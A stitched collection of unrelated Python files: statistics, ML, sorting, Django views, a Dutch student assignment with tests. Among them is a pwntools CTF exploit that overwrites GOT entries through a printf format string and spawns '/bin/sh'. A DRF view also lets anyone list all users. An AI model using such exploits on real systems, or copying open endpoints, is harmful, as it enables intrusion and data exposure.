and then find the distance of the point from the centre of the square, what is the mean distance
of the points from the centre of the square grid. It turns out that the mean distance is
actually the universal parabolic constant: sqrt(2) + log(1+sqrt(2)) ~ 2.2955
In this case, I obtain the result using Monte-Carlo runs. The result can also be derived as a closed form expression.
For more details refer to the twitter thread by Tamas Gorbe:
https://twitter.com/TamasGorbe/status/1246014582113492994
"""
import numpy as np
import matplotlib.pyplot as plt
plt.close('all')
numDataPoints = np.int32(1e7)
xCordinate = np.random.uniform(low=-3,high=+3,size=numDataPoints);
yCordinate = np.random.uniform(low=-3,high=+3,size=numDataPoints);
XYtuple = np.vstack((xCordinate,yCordinate)).T
distFromOrigin = np.linalg.norm(XYtuple,axis=1);
minDist = round(np.amin(distFromOrigin)*100)/100;
maxDist = round(np.amax(distFromOrigin)*100)/100;
numBins = np.int32(1e2)
counts,binEdges = np.histogram(distFromOrigin,bins=numBins);
binCentres = (binEdges[0:-1] + binEdges[1::])/2;
pmf = counts/np.sum(counts) # probability mass function
meanDistanceFromOrigin = np.sum(binCentres*pmf) # expectation = weighted sum of values
meanDistanceFromOrigin = round(np.amax(meanDistanceFromOrigin)*100)/100;
modeDistanceFromOrigin = round(binCentres[np.argmax(pmf)]*100)/100;
# plt.figure(1,figsize=(20,10));
# plt.title('Histogram of distance from origin');
# plt.hist(distFromOrigin,bins=numBins);
# # plt.axvline(minDist,color='k');
# # plt.axvline(maxDist,color='k');
# # plt.text(minDist,0,str(minDist))
# # plt.text(maxDist,0,str(maxDist))
# plt.xlabel('Distance from origin');
# plt.ylabel('Frequency of occurence');
# plt.grid(True)
plt.figure(1,figsize=(20,10));
plt.title('probability density of distance from origin');
plt.plot(binCentres,pmf);
plt.axvline(minDist,linewidth=2,color='k');
plt.axvline(maxDist,linewidth=2,color='k');
plt.axvline(meanDistanceFromOrigin,linewidth=4, color='g');
plt.axvline(modeDistanceFromOrigin,linewidth=4, color='b');
plt.text(minDist,np.amax(pmf)/2,'Min: ' + str(minDist),fontsize=12)
plt.text(maxDist,np.amax(pmf)/2,'Max: ' + str(maxDist),fontsize=12)
plt.text(meanDistanceFromOrigin,np.amax(pmf)/2,'Mean: ' + str(meanDistanceFromOrigin),fontsize=12);
plt.text(modeDistanceFromOrigin,np.amax(pmf)/2,'Mode: ' + str(modeDistanceFromOrigin),fontsize=12)
plt.xlabel('Distance from origin');
plt.ylabel('probability of occurence');
plt.grid(True) |
from __future__ import division
from abc import ABCMeta
import torch
import torch.nn as nn
from torch.autograd import Variable
from tasks.base import FormalTask
from models import VanillaModel
from controllers.feedforward import LinearSimpleStructController
from structs import Stack
class LanguageModelingTask(FormalTask):
"""
Abstract class for language modelling (word prediction) tasks. In a
LanguageModelingTask, the neural network must read each word of the
input sentence and predict the next word. The user may specify a set
of words such that the controller is only evaluated on predictions made
when the correct next word is drawn from that set.
This abstract class implements self._evaluate_step. Subclasses need
to implement functions relating to data generation.
Note that a BufferedModel will always be able to perform a
LanguageModelingTask with perfect accuracy because it can simply
output nothing during the first time step and then copy the input.
"""
class Params(FormalTask.Params):
"""Parameters object for a LanguageModelingTask.
New parameters are listed below.
Attributes:
to_predict: Set or list of unicode characters that should be
predicted and used in accuracy computation.
include_unpredicted_symbols_in_loss: If True, non-null symbols that
are not in to_predict will contribute to loss.
max_length: The maximum sentence length.
mask_null: If True, null characters will always be ignored.
"""
def __init__(self, to_predict, **kwargs):
self.to_predict = to_predict
self.include_unpredicted_symbols_in_loss = kwargs.get(
"include_unpredicted_symbols_in_loss", False)
self.max_length = kwargs.get("max_length", 25)
self.mask_null = kwargs.get("mask_null", True)
super(LanguageModelingTask.Params, self).__init__(**kwargs)
self.criterion = kwargs.get(
"criterion", nn.CrossEntropyLoss(reduction="none"))
if 'max_length' in self.test_override:
self.max_x_length = max(
self.max_length, self.test_override['max_length'])
else:
self.max_x_length = self.max_length
self.max_y_length = self.max_x_length
def __init__(self, params):
super(LanguageModelingTask, self).__init__(params)
self.to_predict_code = [self.alphabet[c] for c in self.to_predict]
def _evaluate_step(self, x, y, a, j):
"""
Computes the loss, number of guesses correct, and total number
of guesses when reading the jth symbol of the input string. If
the correct answer for a prediction does not appear in
self.to_predict, then we consider the loss for that prediction
to be 0.
:type x: Variable
:param x: The input data
:type y: Variable
:param y: The output data
:type a: Variable
:param a: The output of the neural network after reading the jth
word of the sentence, represented as a 2D vector. For each
i, a[i, :] is the controller's prediction for the (j + 1)st
word of the sentence, in one-hot representation
:type j: int
:param j: The jth word of a sentence is being read by the neural
controller when this function is called
:rtype: tuple
:return: The loss, number of correct guesses, and number of
total guesses after reading the jth word of the sentence
"""
_, y_pred = torch.max(a, 1)
if self.mask_null:
# Mask out the null stuff for loss calculation.
null = self.alphabet[self.null]
valid_x = (y[:, j] != null).float()
else:
# Include the null indices while calculating loss.
valid_x = torch.ones_like(y[:, j]).float()
# If we shouldn't include unpredicted symbols in the loss, zero them
# out.
if not self.include_unpredicted_symbols_in_loss:
for k in xrange(len(valid_x)):
if y[k, j].data.item() not in self.to_predict_code:
valid_x[k] = 0
# Compute the loss.
loss = valid_x * self.criterion(a, y[:, j])
# If we should include unpredicted terms in the loss, then we now need
# to mask them out for prediction and accuracy calculation.
if self.include_unpredicted_symbols_in_loss:
to_predict_x = valid_x.data.clone()
for k in xrange(len(valid_x)):
if y[k, j].data.item() not in self.to_predict_code:
to_predict_x[k] = 0
else:
to_predict_x = valid_x
# Compute the accuracy over indices of interest.
correct_trials = (y_pred == y[:, j]).type(torch.FloatTensor)
correct = sum(to_predict_x * correct_trials.data)
total = sum(to_predict_x)
return loss.sum(), correct, total
|
#!/usr/bin/env python
from pwn import *
r = remote("p1.tjctf.org", 8003)
# r = process("./poly")
# gdb.attach(r, '''
# set disable-randomization off
# break *0x400b0a
# c
# ''')
r.sendline("4")
r.sendline("3")
r.recvuntil("below:")
# that's 0x602048 to 0x4009fa and 0x602058 to 0x4006e0
STRCMP = 0x602058
PRINTF = 0x602048
SYSTEM_PLT = 0x4006e0
VIEW_TEAM = 0x400993
VIEW_TEAM_OFF = 0x4009fa
payload = ''
payload += "%57x%30$n".rjust(16)
payload += "%1692x%31$hn".rjust(16)
payload += "%789x%32$hn".rjust(16)
payload += p64(PRINTF + 2)
payload += p64(STRCMP)
payload += p64(PRINTF)
r.sendline(payload)
r.sendline("/bin/sh")
# r.sendline("cat flag.txt")
r.interactive()
|
def check_number_exists(str):
for c in str:
if c.isnumeric():
return True
return False
def check_letter_exists(str):
for c in str:
if c.isalpha():
return True
return False
def main():
password_str = input("请输入密码:")
strength_level = 0
# 规则一:密码长度大于8
if len(password_str) >= 8:
strength_level += 1
else:
print('密码长度要求至少8位!')
# 规则二:包含数字
if check_number_exists(password_str):
strength_level += 1
else:
print('密码中必须包含数字!')
# 规则三:包含字母
if check_letter_exists(password_str):
strength_level += 1
else:
print('密码中必须包含字母!')
if(strength_level == 3):
print('恭喜,您的密码符合规范!')
if __name__ == '__main__':
main()
|
from django.shortcuts import render , redirect
from django.contrib.auth import authenticate , login, logout , update_session_auth_hash
from django.contrib import messages
from .forms import UserRegisterForm , UserAuthenticationForm, UserChangeForm
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth.decorators import login_required
# # Create your views here.
def home (request ) :
return render (request, 'user_profile/home.html')
def register (request ) :
if(request.method == "POST") :
form = UserRegisterForm(request.POST)
if form.is_valid() :
form.save()
email = form.cleaned_data.get("email")
rawpassword = form.cleaned_data.get('password1')
user = authenticate(request , email = email , password = rawpassword)
login(request , user )
messages.success(request , f"Account created for {email}")
return redirect('home_page')
else :
return render(request , 'user_profile/register.html' , {'form' : form})
form = UserRegisterForm()
return render(request , 'user_profile/register.html' , {'form' : form })
def login_view (request ) :
if request.method == "POST" :
login_form = UserAuthenticationForm(request.POST)
if login_form.is_valid() :
email = request.POST["email"]
password = request.POST["password"]
user = authenticate(request , email = email , password = password)
if user :
login(request , user = user )
messages.info(request , f"Hello {email} ")
return redirect('home_page')
else :
messages.error(request , f"Invalid Login")
else :
login_form = UserAuthenticationForm()
return render(request , 'user_profile/login.html' , {"login_form" : login_form } )
def logout_view (request) :
logout(request )
return redirect('home_page')
@login_required(login_url= 'login')
def edit_profile (request ) :
if request.method == "POST" :
form = UserChangeForm(request.POST , instance= request.user)
if form.is_valid() :
form.save()
return redirect('home_page')
else :
form = UserChangeForm(instance= request.user)
return render (request , 'user_profile/edit_profile.html' , {'form' : form })
@login_required (login_url= "login")
def apply(request ) :
return render(request , 'user_profile/apply.html' , { })
@login_required(login_url= "login")
def update_password (request ) :
if request.method == "POST" :
form = PasswordChangeForm(data = request.POST , user= request.user )
if form.is_valid():
form.save()
update_session_auth_hash(request , form.user)
return redirect('home_page')
else :
form = PasswordChangeForm(user = request.user )
return render(request , 'user_profile/edit_password.html' , {"form" : form })
|
#!/usr/bin/env python
# coding: utf-8
# In[3]:
#Gale-Shapley Algorithm
#Created by: Naol Legesse
#Date: September 23/2020
#Purpose: To generate a stable matching for given items or people and their preferance
#Input : N number of male and N number of female participants with their respective preferances
#Output : a stable matching that couples the male and female participants based on their preferance
#Examples: This algorithim can be used in various selection processes and one is given below.
import time
import random
import sys
# This class is used to Implement the Gale-shapley Algrothim.
class Stable_Matching:
def __init__(self):
self.Temporary_man = dict() # dictionary that stores men and their preferance list
self.Temporary_woman = dict() # dictionary that stores women and their preferance list
self.Engaged = [] # list that stores engaged couples
self.Free_men = [] # list for men that have no partners and are single, They need to propose
self.Married = [self.Engaged] # final list of couples that are suitable for each other
def create_match(self, man):
# This helps to get the woman from the man's preference list and create a match
for w in self.Temporary_man[man]:
# iterate through each (man,woman) pair in the engaged lisr and get the pair if the woman exists in it
self.Married = [pair for pair in self.Engaged if w in pair]
# if woman is not in the engaged list or if she's free
if (len(self.Married) == 0):
# engage m and w temporarily
self.Engaged.append([man, w])
self.Free_men.remove(man)
return
# if woman is in the engaged list and she already got a man
elif (len(self.Married) != 0):
Previous_male_partner = self.Married[0][0]
# get the current fiance of woman and the new proposing
# male by their preferance index.
new_man_index = self.Temporary_woman[w].index(man)
Current_fiance = self.Temporary_woman[w].index(Previous_male_partner)
# Compare the indexes of the two and
# pair up with the smaller index as that man is more preferred more by the female
if (new_man_index < Current_fiance):
# remove the new man from free men list as he is now engaged to w
self.Free_men.remove(man)
# change the fiance of w in the paired up list
self.Married[0][0] = man
return
# main function that takes command line arguments
def main(self, argv):
# create a random list of random men by using the range of integer from the command line.
for i in range(0, int(sys.argv[1])):
self.Temporary_man[i] = list(range(0, int(sys.argv[1])))
random.shuffle(self.Temporary_man[i]) # random.shuffle is used
# create a random list of random women by using the range of integer from the command line
for j in range(0, int(sys.argv[1])):
self.Temporary_woman[j] = list(range(0, int(sys.argv[1])))
random.shuffle(self.Temporary_woman[j]) # random.shuffle is used
# add the keys i.e the men in the dictionary of man_temp to the list called freeMenArray
for m in self.Temporary_man.keys():
self.Free_men.append(m)
# This loop runs the actual matching
# we measure the time taken by this algorithm
t = time.time()
while (len(self.Free_men) > 0):
for man in self.Free_men:
self.create_match(man)
print('{} {}'.format(argv, time.time() - t))
if __name__ == '__main__':
Stable_Matching().main(sys.argv[1])
# In[ ]:
|
'''
插入排序
1. 将第一待排序序列第一个元素看做一个有序序列,把第二个元素到最后一个元素当成是未排序序列。
2. 从头到尾依次扫描未排序序列,将扫描到的每个元素插入有序序列的适当位置。(如果待插入的元素与有序序列中的某个元素相等,则将待插入元素插入到相等元素的后面。)
'''
def insertionSort(arr):
for i in range(len(arr)):
preIndex = i - 1
current = arr[i]
while preIndex >= 0 and arr[preIndex] > current:
arr[preIndex + 1] = arr[preIndex]
preIndex -= 1
arr[preIndex + 1] = current
return arr
arr = [17, 3, 2, 7, 5, 15, 4, 9, 8]
arr_sort = insertionSort(arr)
print(arr_sort) |
"""
Collection of MXNet random functions, wrapped to fit Ivy syntax and signature.
"""
# global
import mxnet as _mx
# local
# noinspection PyProtectedMember
from ivy.mxnd.core.general import _mxnet_init_context
# noinspection PyProtectedMember
from ivy.mxnd.core.general import _1_dim_array_to_flat_array
def random_uniform(low=0., high=1., shape=None, dev_str='cpu'):
if isinstance(low, _mx.nd.NDArray):
low = low.asscalar()
if isinstance(high, _mx.nd.NDArray):
high = high.asscalar()
ctx = _mxnet_init_context(dev_str)
if shape is None or len(shape) == 0:
return _1_dim_array_to_flat_array(_mx.nd.random.uniform(low, high, (1,), ctx=ctx))
return _mx.nd.random.uniform(low, high, shape, ctx=ctx)
def multinomial(probs, num_samples):
probs = probs / _mx.nd.sum(probs, -1, True)
return _mx.nd.sample_multinomial(probs, (num_samples,))
def randint(low, high, shape, dev_str='cpu'):
if isinstance(low, _mx.nd.NDArray):
low = int(low.asscalar())
if isinstance(high, _mx.nd.NDArray):
high = int(high.asscalar())
ctx = _mxnet_init_context(dev_str)
if len(shape) == 0:
return _1_dim_array_to_flat_array(_mx.nd.random.randint(
low, high, (1,), ctx=ctx))
return _mx.nd.random.randint(low, high, shape, ctx=ctx)
seed = lambda seed_value=0: _mx.random.seed(seed_value)
shuffle = lambda x: _mx.nd.random.shuffle(x)
|
# print("Enter Row value:", end=" ")
for row in range(4):
for column in range(8):
if (column==0 or column==7) or (column==1 and row!=3) or (column==2 and row<2) or (column==6 and row<3) or (column==5 and row<2) or ((column==3 or column==4) and row==0):
print ("*", end="")
else:
print("",end=" ")
print() |
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth.models import User
# Create your views here.
def signup(request):
return render(request, 'signup.html')
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 20 14:13:51 2014
@author: ogavril
"""
import os
import numpy as np
import pandas as pd
import neuralnet
import functions
def initialize_train_data(DATA_DIR,fn):
df = pd.read_csv(DATA_DIR+fn)
"""needs possible extensions: 1) filling NANs, 2) trimming; 3) outliering, 4) transforming, etc."""
return df
def initialize_test_data(DATA_DIR,fn):
"""usually differs from train data as there is target"""
df = pd.read_csv(DATA_DIR+fn)
"""needs possible extensions: 1) filling NANs, 2) trimming; 3) outliering, 4) transforming, etc."""
return df
def valid_variables(df,target_var):
col_names = []
for col in df.columns:
if col not in ["_TRAIN",target_var]:
col_names.append(col)
return col_names
if __name__== "__main__":
#load in the data
DATA_DIR = ".."+os.sep+"data"+os.sep
train_fn = "test07_SquarePlusItself.csv"#"test02_logNexp.csv"##"test01.csv"#test02_logNexp.csv"#"# test06_Square_plus_random.csv"#"test03.csv"#"test04.csv"##"test03_random.csv"#"test05.csv"#""test07_Square.csv"#
#observations,target,df = initialize_data(DATA_DIR,train_fn)
train_df = initialize_train_data(DATA_DIR,train_fn)
target_var = "response"
"""organize data into train, test,and vaildate"""
train_var = "_TRAIN"
validation_set = 4
test_set = -1#validation_set +1
train_df = functions.def_cross_validation_subsets(train_df,train_var,numK=validation_set+1)
test_df = train_df[train_df[train_var] == test_set]
train_df = train_df[train_df[train_var] != test_set]
test_df[train_var] = test_set
"""put the two DFs together to perform transformations, trimming, filling NANs if necessary etc."""
DF = pd.concat([train_df, test_df], ignore_index=False)
DF['const'] = 1.0 #adding the bias node; in some situations it should be omitted
print "size of concatenated DF",len(DF),"number of columns:", len(DF.columns)
explanatory_vars = valid_variables(train_df,target_var)
if 'const' in DF.columns:
explanatory_vars += ['const']
print "useful vars:",explanatory_vars
scaled_DF = DF.copy()
for col in explanatory_vars:
scaled_DF[col] = functions.scale(DF,col)
#scaled_DF.to_csv("scaledDF.csv")
scaled_DF[target_var] = functions.scale(DF,target_var)
"""separate the two DFs AFTER all the variable manipulating work is done"""
train_df = scaled_DF[scaled_DF[train_var] != test_set ]
test_df = scaled_DF[scaled_DF[train_var] == test_set]
train_data = functions.make_numpy_matrix(train_df[train_df[train_var] != validation_set],explanatory_vars)
train_target = np.array(train_df[target_var][train_df[train_var] != validation_set])#.reshape(train_data.shape[0],1)
validation_data = functions.make_numpy_matrix(train_df[train_df[train_var] == validation_set],explanatory_vars)
validation_target = np.array(train_df[target_var][train_df[train_var] == validation_set])#.reshape(validation_data.shape[0],1)
hdn = train_data.shape[1]+2
numEpochs = 200
lr = 0.05
linNeuron = True
neural_net = neuralnet.SimpleNeuralNet(train_data.shape[1],num_hidden_neurons=hdn,
num_epochs=numEpochs,LearningRate=lr,include_LinearNeuron = linNeuron,
include_InputBias=True,include_OutputBias=True)
net = neural_net.train(train_data,train_target,plot=True)
print "weights_HO:",net.weights_HO
print "weights_HI:",net.weights_IH
predicted_values_train,RMSE_train = neural_net.validate(train_data,train_target)
predicted_values_validation,RMSE_validation= neural_net.validate(validation_data,validation_target)
|
# -*- coding:utf-8 -*-
from django.shortcuts import render_to_response,HttpResponseRedirect
from django.http import HttpResponse,Http404,HttpResponseRedirect
from public_tool import user,tools
from http_tool.models import HttpSend
from .models import ProjectInfo
def project_create(request):
username = request.session['username']
user_id = user.getuserid(username)
if request.method == 'POST' :
project_name = request.POST.get('project_name')
start_time = tools.time_conctrol(request.POST.get('start_time'))
smock_time = tools.time_conctrol(request.POST.get('smock_time'))
online_time = tools.time_conctrol(request.POST.get('online_time'))
participant = request.POST.get('participant')
project_manager = request.POST.get('project_manager')
try:
#从表单获取数据插入ProjectInfo表
ProjectInfo.objects.create(project_name = project_name , start_time = start_time ,smock_time = smock_time, online_time = online_time,participant =participant ,user_id = user_id,project_manager=project_manager )
return HttpResponseRedirect('/project/list/')#插入成功跳转列表页
except Exception , e :
#此处需要添加日志
#插入失败,刷新页面
return HttpResponse(e)
return render_to_response('project_control/project_process_create.html',{'username':username})
def project_list(request):
username = request.session['username']
user_id = user.getuserid(username)
if user_id :
project_list = list(ProjectInfo.objects.filter(user_id = user_id).values("project_name","start_time","smock_time","online_time","participant","project_manager","current_phase"))
return render_to_response('project_control/project_process_list.html',{'project_list':project_list,'username':username})
def get_edit(request,id):
return render_to_response('http_tool/get_list.html', {'username': id})
def get_detail(request,id):
return render_to_response('http_tool/get_list.html',{'username':id})
def get_delete(request,id):
HttpSend.objects.filter(id=id).delete()
return project_create(request)
|
"""
给你二叉搜索树的根节点 root ,该树中的两个节点被错误地交换。请在不改变其结构的情况下,恢复这棵树。
进阶:使用 O(n) 空间复杂度的解法很容易实现。你能想出一个只使用常数空间的解决方案吗?
示例 1:
输入:root = [1,3,null,null,2]
输出:[3,1,null,null,2]
解释:3 不能是 1 左孩子,因为 3 > 1 。交换 1 和 3 使二叉搜索树有效。
示例 2:
输入:root = [3,1,4,null,null,2]
输出:[2,1,4,null,null,3]
解释:2 不能在 3 的右子树中,因为 2 < 3 。交换 2 和 3 使二叉搜索树有效。
提示:
树上节点的数目在范围 [2, 1000] 内
-231 <= Node.val <= 231 - 1
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/recover-binary-search-tree
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
# 注释掉的部分是空间复杂度O(N)的做法
# 核心思想是二叉搜索树的中序遍历一定是有序的,所以在这样的序列中寻找异常节点进行节点的值的交换
# 之所以能够做到O(1)的空间复杂度是因为中序遍历可以是隐式地,没有必要保存一整个序列,只要知道遍历的时候每个节点的前一个节点是什么就可以发现异常节点了。
class Solution:
# def dfs(self, root: TreeNode, q: List[TreeNode]) -> None:
# if root.left:
# q = self.dfs(root.left, q)
# q.append(root)
# if root.right:
# q = self.dfs(root.right, q)
# return q
# def recoverTree(self, root: TreeNode) -> None:
# """
# Do not return anything, modify root in-place instead.
# """
# all_nodes = []
# all_nodes = self.dfs(root, [])
# abnormal_pos = []
# for i in range(len(all_nodes)-1):
# if all_nodes[i].val > all_nodes[i+1].val:
# abnormal_pos.append(i)
# if len(abnormal_pos)==1:
# i, j = abnormal_pos[0], abnormal_pos[0]+1
# tmp = all_nodes[i].val
# all_nodes[i].val = all_nodes[j].val
# all_nodes[j].val = tmp
# else:
# i, j = abnormal_pos[0], abnormal_pos[1]+1
# tmp = all_nodes[i].val
# all_nodes[i].val = all_nodes[j].val
# all_nodes[j].val = tmp
def dfs(self, root: TreeNode, pre: TreeNode, q: List):
if root.left:
q, pre = self.dfs(root.left, pre, q)
if pre and pre.val > root.val:
q.append((pre, root))
pre = root
if root.right:
q, pre = self.dfs(root.right, pre, q)
return q, pre
def recoverTree(self, root: TreeNode) -> None:
q, _ = self.dfs(root, None, [])
if len(q) == 1:
i, j = q[0][0], q[0][1]
tmp = i.val
i.val = j.val
j.val = tmp
else:
i, j = q[0][0], q[1][1]
tmp = i.val
i.val = j.val
j.val = tmp
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Oriëntatie op AI
Practicum 3: statistiek
(c) 2019 Hogeschool Utrecht
Bart van Eijkelenburg (bart.vaneijkelenburg@hu.nl)
Tijmen Muller (tijmen.muller@hu.nl)
Opdracht:
Werk onderstaande functies uit. Elke functie krijgt een niet-lege en
ongesorteerde lijst *lst* met gehele getallen (int) als argument.
Voeg commentaar toe om je code toe te lichten.
Je kunt je functies testen met het gegeven raamwerk door het bestand
uit te voeren (of met behulp van pytest, als je weet hoe dat werkt).
Lever je werk in op Canvas als alle tests slagen.
Let op! Het is niet toegestaan om bestaande modules te importeren en te
gebruiken, zoals `math` en `statistics`.
"""
# Vul hier je naam, klas en studentnummer in
naam = ""
klas = ""
studentnummer = -1
def mean(lst):
""" Retourneer het gemiddelde (float) van de lijst lst. """
return
def rnge(lst):
""" Retourneer het bereik (int) van de lijst lst. """
return
def median(lst):
""" Retourneer de mediaan (float) van de lijst lst. """
return
def q1(lst):
"""
Retourneer het eerste kwartiel Q1 (float) van de lijst lst.
Tip: maak gebruik van median()
"""
return
def q3(lst):
""" Retourneer het derde kwartiel Q3 (float) van de lijst lst. """
return
def var(lst):
""" Retourneer de variantie (float) van de lijst lst. """
return
def std(lst):
""" Retourneer de standaardafwijking (float) van de lijst lst. """
return
def freq(lst):
"""
Retourneer een dictionary met als keys de waardes die voorkomen in lst en
als value het aantal voorkomens van die waarde.
Examples:
>> freq([0, 0, 4, 5])
{0: 2, 4: 1, 5: 1}
"""
freqs = dict()
return freqs
def modes(lst):
""" Retourneer een gesorteerde lijst (list) van de modi van lijst lst. Maak gebruik van freq(). """
modi = []
return sorted(modi)
"""
==========================[ HU TESTRAAMWERK ]================================
Onderstaand staan de tests voor je code -- hieronder mag je niets wijzigen!
Je kunt je code testen door deze file te runnen of met behulp van pytest.
"""
def my_assert_args(function, args, expected_output, check_type=True):
"""
Controleer of gegeven functie met gegeven argumenten het verwachte resultaat oplevert.
Optioneel wordt ook het return-type gecontroleerd.
"""
argstr = str(args).replace(',)', ')')
output = function(*args)
# Controleer eerst het return-type (optioneel)
if check_type:
msg = f"Fout: {function.__name__}{argstr} geeft geen {type(expected_output)} terug als return-type"
assert type(output) is type(expected_output), msg
# Controleer of de functie-uitvoer overeenkomt met de gewenste uitvoer
msg = f"Fout: {function.__name__}{argstr} geeft {output} in plaats van {expected_output}"
if type(expected_output) is float:
# Vergelijk bij float als return-type op 7 decimalen om afrondingsfouten te omzeilen
assert round(output - expected_output, 7) == 0, msg
else:
assert output == expected_output, msg
def test_id():
assert naam != "", "Je moet je naam nog invullen!"
assert studentnummer != -1, "Je moet je studentnummer nog invullen!"
assert klas != "", "Je moet je klas nog invullen!"
def test_mean():
testcases = [
(([4, 2, 5, 8, 6],), 5.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 3.0)
]
for case in testcases:
my_assert_args(mean, case[0], case[1])
def test_mean_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(mean, (lst_test,), statistics.mean(lst_test), False)
def test_rnge():
testcases = [
(([4, 2, 5, 8, 6],), 6),
(([1, 3, 2, 4, 6, 2, 4, 2],), 5)
]
for case in testcases:
my_assert_args(rnge, case[0], case[1])
def test_median():
testcases = [
(([4, 2, 5, 8, 6],), 5.0),
(([1, 3, 4, 6, 4, 2],), 3.5),
(([1, 3, 4, 6, 2, 4, 2],), 3.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 2.5)
]
for case in testcases:
my_assert_args(median, case[0], case[1])
def test_median_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(median, (lst_test,), statistics.median(lst_test), False)
def test_q1():
testcases = [
(([4, 2, 5, 8, 6],), 3.0),
(([1, 3, 4, 6, 4, 2],), 2.0),
(([1, 3, 5, 6, 1, 4, 2],), 1.0),
(([5, 7, 4, 4, 6, 2, 8],), 4.0),
(([0, 5, 5, 6, 7, 7, 12],), 5.0),
(([1, 3, 3, 5, 6, 2, 4, 1],), 1.5),
(([3, 5, 7, 8, 9, 11, 15, 16, 20, 21],), 7.0),
(([1, 2, 5, 6, 7, 9, 12, 15, 18, 19, 27],), 5.0)
]
for case in testcases:
my_assert_args(q1, case[0], case[1])
def test_q3():
testcases = [
(([4, 2, 5, 8, 6],), 7.0),
(([1, 3, 4, 6, 4, 2],), 4.0),
(([1, 3, 5, 6, 2, 4, 1],), 5.0),
(([5, 7, 4, 4, 6, 2, 8],), 7.0),
(([0, 5, 5, 6, 7, 7, 12],), 7.0),
(([1, 3, 3, 5, 6, 2, 4, 1],), 4.5),
(([1, 3, 3, 5, 6, 2, 4, 1],), 4.5),
(([3, 5, 7, 8, 9, 11, 15, 16, 20, 21],), 16.0),
(([1, 2, 5, 6, 7, 9, 12, 15, 18, 19, 27],), 18.0)
]
for case in testcases:
my_assert_args(q3, case[0], case[1])
def test_var():
testcases = [
(([4, 2, 5, 8, 6],), 4.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 2.25)
]
for case in testcases:
my_assert_args(var, case[0], case[1])
def test_var_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(var, (lst_test,), statistics.pvariance(lst_test), False)
def test_std():
testcases = [
(([4, 2, 5, 8, 6],), 2.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 1.5)
]
for case in testcases:
my_assert_args(std, case[0], case[1])
def test_std_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(std, (lst_test,), statistics.pstdev(lst_test), False)
def test_freq():
testcases = [
(([4, 2, 5, 8, 6],), {2: 1, 4: 1, 5: 1, 6: 1, 8: 1}),
(([1, 3, 4, 6, 4, 2],), {1: 1, 2: 1, 3: 1, 4: 2, 6: 1}),
(([1, 3, 5, 6, 2, 4, 1],), {1: 2, 2: 1, 3: 1, 4: 1, 5: 1, 6: 1}),
(([1, 3, 3, 5, 6, 2, 4, 1],), {1: 2, 2: 1, 3: 2, 4: 1, 5: 1, 6: 1})
]
for case in testcases:
my_assert_args(freq, case[0], case[1])
def test_modes():
testcases = [
(([4, 2, 5, 8, 6],), [2, 4, 5, 6, 8]),
(([1, 3, 4, 6, 4, 2],), [4]),
(([1, 3, 4, 6, 2, 4, 2],), [2, 4]),
(([1, 3, 2, 4, 6, 2, 4, 2],), [2])
]
for case in testcases:
my_assert_args(modes, case[0], case[1])
def main():
try:
print("\x1b[0;32m")
test_id()
test_mean()
test_mean_simulated()
print("Je functie mean(lst) werkt goed!")
test_rnge()
print("Je functie rnge(lst) werkt goed!")
test_median()
test_median_simulated()
print("Je functie median(lst) werkt goed!")
test_q1()
print("Je functie q1(lst) werkt goed!")
test_q3()
print("Je functie q3(lst) werkt goed!")
test_var()
test_var_simulated()
print("Je functie var(lst) werkt goed!")
test_std()
test_std_simulated()
print("Je functie std(lst) werkt goed!")
test_freq()
print("Je functie freq(lst) werkt goed!")
test_modes()
print("Je functie modes(lst) werkt goed!")
print("\nGefeliciteerd, alles lijkt te werken!")
print("Lever je werk nu in op Canvas...")
def hist(freqs):
v_min = min(freqs.keys())
v_max = max(freqs.keys())
histo = str()
for i in range(v_min, v_max + 1):
histo += "{:5d} ".format(i)
if i in freqs.keys():
histo += "█" * freqs[i]
histo += '\n'
return histo
print("\x1b[0;30m")
s = input("Geef een reeks van gehele getallen (gescheiden door een spatie): ")
userlst = [int(c) for c in s.split()]
print("\nHet gemiddelde is {:.2f}".format(mean(userlst)))
print("De modi zijn {}".format(modes(userlst)))
print("De mediaan is {:.2f}".format(median(userlst)))
print("Q1 is {:.2f}".format(q1(userlst)))
print("Q3 is {:.2f}".format(q3(userlst)))
print("Het bereik is {}".format(rnge(userlst)))
print("De variantie is {:.2f}".format(var(userlst)))
print("De standaardafwijking is {:.2f}".format(std(userlst)))
print("\nHistogram (gekanteld):\n\n" + hist(freq(userlst)))
except AssertionError as ae:
print("\x1b[0;31m")
print(ae)
if __name__ == '__main__':
main()
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status, generics, filters
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.permissions import IsAdminUser, AllowAny
from .serializers import UserSerializer, ProfileSerializer
from .models import User, Profile, Profile
class UserAPI(APIView):
"""
API to create a user or get all users.
"""
permission_classes = [AllowAny]
def get(self, request, format=None):
users = User.objects.all()
serializer = UserSerializer(users, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = UserSerializer(data=request.data)
if serializer.is_valid():
user = serializer.save()
Profile.objects.create(user=user)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class OrganizationAPI(APIView):
def get(self, request, format=None):
print(request.data)
return Response({"test": "test"})
class ProfileAPI(APIView):
def get(self, request, format=None):
user_id = request.query_params.get('user_id', None)
consumer = Profile.objects.get(user__id=user_id)
serializer = ProfileSerializer(consumer)
return Response(serializer.data)
def put(self, request, format=None):
consumer = Profile.objects.get(id=request.data['id'])
serializer = ProfileSerializer(consumer, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
